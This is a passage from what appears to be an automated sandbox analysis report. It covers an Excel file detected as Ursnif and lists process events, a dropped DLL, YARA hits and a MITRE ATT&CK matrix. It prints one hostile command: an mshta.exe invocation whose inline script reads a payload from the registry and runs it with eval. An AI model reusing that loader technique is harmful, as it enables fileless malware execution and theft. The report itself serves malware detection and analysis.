            Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (30 occurrences)
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\11[1].dll
            Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

            Stealing of Sensitive Information:

            Yara detected Ursnif (same nine memory-dump matches and the rundll32.exe PID 7104 process-memory match as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

            Remote Access Functionality:

            Yara detected Ursnif (same nine memory-dump matches and the rundll32.exe PID 7104 process-memory match as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

            MITRE ATT&CK Matrix

            Techniques followed by a number in parentheses were hit by that many signatures in this analysis; the remaining entries are the matrix's fixed placeholder techniques and were not observed.

            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts
            Execution: Windows Management Instrumentation (1), Command and Scripting Interpreter (1), Exploitation for Client Execution (4), At (Windows)
            Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac)
            Privilege Escalation: Process Injection (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac)
            Defense Evasion: Masquerading (1), Process Injection (1), Rundll32 (1), Binary Padding
            Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS
            Discovery: Query Registry (1), File and Directory Discovery (1), System Information Discovery (12), System Network Configuration Discovery
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model
            Collection: Email Collection (1), Data from Removable Media, Data from Network Shared Drive, Input Capture
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer
            Command and Control: Encrypted Channel (2), Ingress Tool Transfer (3), Non-Application Layer Protocol (4), Application Layer Protocol (5)
            Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap
            Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud
            Impact: Modify System Partition, Device Lockout, Delete Device Data

            Behavior Graph
